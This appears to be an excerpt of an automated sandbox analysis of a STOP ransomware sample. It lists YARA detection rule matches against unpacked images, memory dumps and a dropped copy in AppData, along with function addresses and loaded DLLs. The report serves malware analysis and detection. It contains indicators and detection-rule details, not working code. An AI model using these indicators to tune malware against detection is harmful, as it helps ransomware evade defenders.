              Source: 6.2.c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe.f00000.0.unpack, type: UNPACKEDPEMatched rule: Detects STOP ransomware Author: ditekSHen
              Source: 2.0.c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe.f10000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
              Source: 2.0.c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe.f10000.0.unpack, type: UNPACKEDPEMatched rule: Detects STOP ransomware Author: ditekSHen
              Source: 0.0.c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe.f10000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
              Source: 0.0.c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe.f10000.0.unpack, type: UNPACKEDPEMatched rule: Detects STOP ransomware Author: ditekSHen
              Source: 00000003.00000000.1661537232.0000000000FCC000.00000002.00000001.01000000.00000007.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
              Source: 00000003.00000000.1661461662.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
              Source: 00000000.00000002.1642055463.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
              Source: 00000000.00000000.1623898320.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
              Source: 00000002.00000000.1641298642.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
              Source: 00000000.00000003.1638345295.0000000003681000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
              Source: Process Memory Space: c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe PID: 6828, type: MEMORYSTR; Matched rule: Windows_Ransomware_Stop_1e8d48ff; Author: unknown
              Source: Process Memory Space: c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe PID: 6956, type: MEMORYSTR; Matched rule: Windows_Ransomware_Stop_1e8d48ff; Author: unknown
              Source: Process Memory Space: c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe PID: 5776, type: MEMORYSTR; Matched rule: Windows_Ransomware_Stop_1e8d48ff; Author: unknown
              Source: Process Memory Space: c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe PID: 5644, type: MEMORYSTR; Matched rule: Windows_Ransomware_Stop_1e8d48ff; Author: unknown
              Source: Process Memory Space: c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe PID: 5104, type: MEMORYSTR; Matched rule: Windows_Ransomware_Stop_1e8d48ff; Author: unknown
              Source: C:\Users\user\AppData\Local\15a6b383-1056-4ab7-9872-1a77d608b673\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, type: DROPPED; Matched rule: Windows_Ransomware_Stop_1e8d48ff; Author: unknown
              Source: C:\Users\user\AppData\Local\15a6b383-1056-4ab7-9872-1a77d608b673\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, type: DROPPED; Matched rule: Detects STOP ransomware; Author: ditekSHen
              Source: C:\Users\user\AppData\Local\15a6b383-1056-4ab7-9872-1a77d608b673\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeCode function: 4_2_00F49A714_2_00F49A71
              Source: C:\Users\user\AppData\Local\15a6b383-1056-4ab7-9872-1a77d608b673\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeCode function: 4_2_00F02B804_2_00F02B80
              Source: C:\Users\user\AppData\Local\15a6b383-1056-4ab7-9872-1a77d608b673\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeCode function: 4_2_00F06B804_2_00F06B80
              Source: C:\Users\user\AppData\Local\15a6b383-1056-4ab7-9872-1a77d608b673\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeCode function: 4_2_00F43B404_2_00F43B40
              Source: C:\Users\user\AppData\Local\15a6b383-1056-4ab7-9872-1a77d608b673\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeCode function: 4_2_00F09CF94_2_00F09CF9
              Source: C:\Users\user\AppData\Local\15a6b383-1056-4ab7-9872-1a77d608b673\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeCode function: 4_2_00F4ACFF4_2_00F4ACFF
              Source: C:\Users\user\AppData\Local\15a6b383-1056-4ab7-9872-1a77d608b673\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeCode function: 4_2_00F09DFA4_2_00F09DFA
              Source: C:\Users\user\AppData\Local\15a6b383-1056-4ab7-9872-1a77d608b673\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeCode function: 4_2_00F0BDC04_2_00F0BDC0
              Source: C:\Users\user\AppData\Local\15a6b383-1056-4ab7-9872-1a77d608b673\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeCode function: 4_2_00F27D6C4_2_00F27D6C
              Source: C:\Users\user\AppData\Local\15a6b383-1056-4ab7-9872-1a77d608b673\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeCode function: 4_2_00F0DD404_2_00F0DD40
              Source: C:\Users\user\AppData\Local\15a6b383-1056-4ab7-9872-1a77d608b673\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeCode function: 4_2_00F06EE04_2_00F06EE0
              Source: C:\Users\user\AppData\Local\15a6b383-1056-4ab7-9872-1a77d608b673\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeCode function: 4_2_00F2CE514_2_00F2CE51
              Source: C:\Users\user\AppData\Local\15a6b383-1056-4ab7-9872-1a77d608b673\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeCode function: 4_2_00F49FE34_2_00F49FE3
              Source: C:\Users\user\AppData\Local\15a6b383-1056-4ab7-9872-1a77d608b673\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeCode function: 4_2_00F09F764_2_00F09F76
              Source: C:\Users\user\AppData\Local\15a6b383-1056-4ab7-9872-1a77d608b673\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeCode function: 4_2_00F20F304_2_00F20F30
              Source: C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
              Section loaded: apphelp.dll, mpr.dll, wininet.dll, winmm.dll, iphlpapi.dll, dnsapi.dll, iertutil.dll, sspicli.dll, windows.storage.dll, wldp.dll, profapi.dll, kernel.appcore.dll, ondemandconnroutehelper.dll, winhttp.dll, mswsock.dll, winnsi.dll, urlmon.dll, srvcli.dll, netutils.dll, rasadhlp.dll, fwpuclnt.dll, schannel.dll, mskeyprotect.dll, ntasn1.dll, msasn1.dll, dpapi.dll, cryptsp.dll, rsaenh.dll, cryptbase.dll, gpapi.dll, ncrypt.dll, ncryptsslp.dll, ntmarta.dll, uxtheme.dll, taskschd.dll, xmllite.dll, propsys.dll, edputil.dll, windows.staterepositoryps.dll, wintypes.dll, appresolver.dll, bcp47langs.dll, slc.dll, userenv.dll, sppc.dll, onecorecommonproxystub.dll, onecoreuapcommonproxystub.dll, pcacli.dll, sfc_os.dll
              Source: C:\Windows\SysWOW64\icacls.exe
              Section loaded: ntmarta.dll
              Source: C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
              Section loaded: mpr.dll, wininet.dll, winmm.dll, iphlpapi.dll, dnsapi.dll, iertutil.dll, sspicli.dll, windows.storage.dll, wldp.dll, profapi.dll, kernel.appcore.dll, ondemandconnroutehelper.dll, winhttp.dll, mswsock.dll, winnsi.dll, dpapi.dll, msasn1.dll, cryptsp.dll, rsaenh.dll, cryptbase.dll, gpapi.dll, urlmon.dll, srvcli.dll, netutils.dll, rasadhlp.dll, fwpuclnt.dll, schannel.dll, mskeyprotect.dll, ntasn1.dll, ncrypt.dll, ncryptsslp.dll, uxtheme.dll, taskschd.dll, xmllite.dll, dhcpcsvc.dll, propsys.dll, edputil.dll, windows.staterepositoryps.dll, wintypes.dll, appresolver.dll, bcp47langs.dll, slc.dll, userenv.dll, sppc.dll, onecorecommonproxystub.dll, onecoreuapcommonproxystub.dll, drprov.dll, winsta.dll, ntlanman.dll, davclnt.dll, davhlpr.dll, wkscli.dll, cscapi.dll, browcli.dll, netapi32.dll
              Source: C:\Users\user\AppData\Local\15a6b383-1056-4ab7-9872-1a77d608b673\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
              Section loaded: apphelp.dll, mpr.dll, wininet.dll, winmm.dll, iphlpapi.dll, dnsapi.dll, iertutil.dll, sspicli.dll, windows.storage.dll, wldp.dll, profapi.dll, kernel.appcore.dll, ondemandconnroutehelper.dll, winhttp.dll, mswsock.dll, winnsi.dll, dpapi.dll, msasn1.dll, cryptsp.dll, rsaenh.dll, cryptbase.dll, gpapi.dll, urlmon.dll, srvcli.dll, netutils.dll, rasadhlp.dll, fwpuclnt.dll, schannel.dll, mskeyprotect.dll, ntasn1.dll, ncrypt.dll, ncryptsslp.dll, dhcpcsvc.dll, uxtheme.dll, drprov.dll, winsta.dll
              Source: C:\Users\user\AppData\Local\15a6b383-1056-4ab7-9872-1a77d608b673\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeSection loaded: ntlanman.dllJump to behavior
              Source: C:\Users\user\AppData\Local\15a6b383-1056-4ab7-9872-1a77d608b673\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeSection loaded: davclnt.dllJump to behavior
              Source: C:\Users\user\AppData\Local\15a6b383-1056-4ab7-9872-1a77d608b673\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeSection loaded: davhlpr.dllJump to behavior
              Source: C:\Users\user\AppData\Local\15a6b383-1056-4ab7-9872-1a77d608b673\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeSection loaded: wkscli.dllJump to behavior
              Source: C:\Users\user\AppData\Local\15a6b383-1056-4ab7-9872-1a77d608b673\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeSection loaded: cscapi.dllJump to behavior
              Source: C:\Users\user\AppData\Local\15a6b383-1056-4ab7-9872-1a77d608b673\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeSection loaded: browcli.dllJump to behavior
              Source: C:\Users\user\AppData\Local\15a6b383-1056-4ab7-9872-1a77d608b673\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeSection loaded: netapi32.dllJump to behavior
              Source: C:\Users\user\AppData\Local\15a6b383-1056-4ab7-9872-1a77d608b673\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeSection loaded: mpr.dllJump to behavior
              Source: C:\Users\user\AppData\Local\15a6b383-1056-4ab7-9872-1a77d608b673\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeSection loaded: wininet.dllJump to behavior
              Source: C:\Users\user\AppData\Local\15a6b383-1056-4ab7-9872-1a77d608b673\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeSection loaded: winmm.dllJump to behavior
              Source: C:\Users\user\AppData\Local\15a6b383-1056-4ab7-9872-1a77d608b673\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Users\user\AppData\Local\15a6b383-1056-4ab7-9872-1a77d608b673\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Users\user\AppData\Local\15a6b383-1056-4ab7-9872-1a77d608b673\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Users\user\AppData\Local\15a6b383-1056-4ab7-9872-1a77d608b673\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Users\user\AppData\Local\15a6b383-1056-4ab7-9872-1a77d608b673\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Users\user\AppData\Local\15a6b383-1056-4ab7-9872-1a77d608b673\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Users\user\AppData\Local\15a6b383-1056-4ab7-9872-1a77d608b673\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Users\user\AppData\Local\15a6b383-1056-4ab7-9872-1a77d608b673\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Users\user\AppData\Local\15a6b383-1056-4ab7-9872-1a77d608b673\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\AppData\Local\15a6b383-1056-4ab7-9872-1a77d608b673\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Users\user\AppData\Local\15a6b383-1056-4ab7-9872-1a77d608b673\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Users\user\AppData\Local\15a6b383-1056-4ab7-9872-1a77d608b673\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeSection loaded: winnsi.dllJump to behavior
              Source: c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
              Source: c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, type: SAMPLE, Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
              Source: c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, type: SAMPLE, Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
              Source: 4.0.c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe.f00000.0.unpack, type: UNPACKEDPE, Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
              Source: 4.0.c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe.f00000.0.unpack, type: UNPACKEDPE, Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
              Source: 3.0.c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe.f00000.0.unpack, type: UNPACKEDPE, Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
              Source: 3.0.c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe.f00000.0.unpack, type: UNPACKEDPE, Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
              Source: 3.2.c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe.f00000.0.unpack, type: UNPACKEDPE, Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
              Source: 6.0.c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe.f00000.0.unpack, type: UNPACKEDPE, Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
              Source: 6.0.c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe.f00000.0.unpack, type: UNPACKEDPE, Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
              Source: 4.2.c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe.f00000.0.unpack, type: UNPACKEDPE, Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
              Source: 3.2.c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe.f00000.0.unpack, type: UNPACKEDPE, Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
              Source: 4.2.c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe.f00000.0.unpack, type: UNPACKEDPE, Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
              Source: 0.2.c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe.f10000.0.unpack, type: UNPACKEDPE, Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
              Source: 0.2.c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe.f10000.0.unpack, type: UNPACKEDPE, Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
              Source: 2.2.c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe.f10000.0.unpack, type: UNPACKEDPE, Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
              Source: 2.2.c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe.f10000.0.unpack, type: UNPACKEDPE, Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
              Source: 6.2.c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe.f00000.0.unpack, type: UNPACKEDPE, Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
              Source: 6.2.c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe.f00000.0.unpack, type: UNPACKEDPE, Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
              Source: 2.0.c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe.f10000.0.unpack, type: UNPACKEDPE, Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
              Source: 2.0.c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe.f10000.0.unpack, type: UNPACKEDPE, Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
              Source: 0.0.c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe.f10000.0.unpack, type: UNPACKEDPE, Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
              Source: 0.0.c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe.f10000.0.unpack, type: UNPACKEDPE, Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
              Source: 00000003.00000000.1661537232.0000000000FCC000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY, Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
              Source: 00000003.00000000.1661461662.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, type: MEMORY, Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
              Source: 00000000.00000002.1642055463.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY, Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
              Source: 00000000.00000000.1623898320.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY, Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
              Source: 00000002.00000000.1641298642.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY, Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
              Source: 00000000.00000003.1638345295.0000000003681000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
              Source: 00000003.00000002.2884974054.0000000000FCC000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY, Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
